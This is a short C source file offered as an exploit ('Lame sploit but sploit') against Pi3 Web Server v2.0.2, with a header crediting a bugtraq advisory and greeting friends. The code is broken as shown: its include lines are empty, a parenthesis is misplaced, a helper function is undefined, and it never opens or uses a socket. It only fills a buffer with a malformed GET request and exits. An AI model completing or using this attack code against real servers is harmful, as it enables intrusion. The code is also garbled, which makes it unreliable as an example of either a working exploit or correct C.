/* * Simply exploit for Pi3 Web Server v2.0.2 coded by pi3 (pi3ki31ny) * Bug founded by rushjo@tripbit.org * The post in bugtraq: * http://www.securityfocus.com/archive/1/323662 * BIG thx to: Azido, mcbethh (Ox6D6362), OctiV, bor3cki, appelast, evilcat, cyb3rg4te, * jejq, neutrinka, ProXymuS, razer, xsoti, oZiX, barts... * && other my friends (you know who you are) * * Ps. Lame sploit but sploit ;> * * ...::: -=[ www.pi3.int.pl ]=- :::... */ #include #include #include #include #include #include #define PORT 80 #define SA struct sockaddr int main(int argc, char *argv[]) { int i=PORT,opt=0,sockfd; struct sockaddr_in servaddr; struct hostent *h; char buf[150]; if (argv[1]==NULL) ussage(); while((opt = getopt(argc,argv,"h:p:?")) != -1) { switch(opt) { case 'h': if ((h=gethostbyname(optarg)==NULL)) { printf("Gethostbyname() field!\n"); exit(-1); } break; case 'p': i=atoi(optarg); break; case '?': ussage(); break; default: ussage(); break; } } servaddr.sin_family = AF_INET; servaddr.sin_port = htons(i); servaddr.sin_addr.s_addr = htonl(INADDR_ANY); strcpy(buf,"GET /\n -p \n\n"); exit(0); }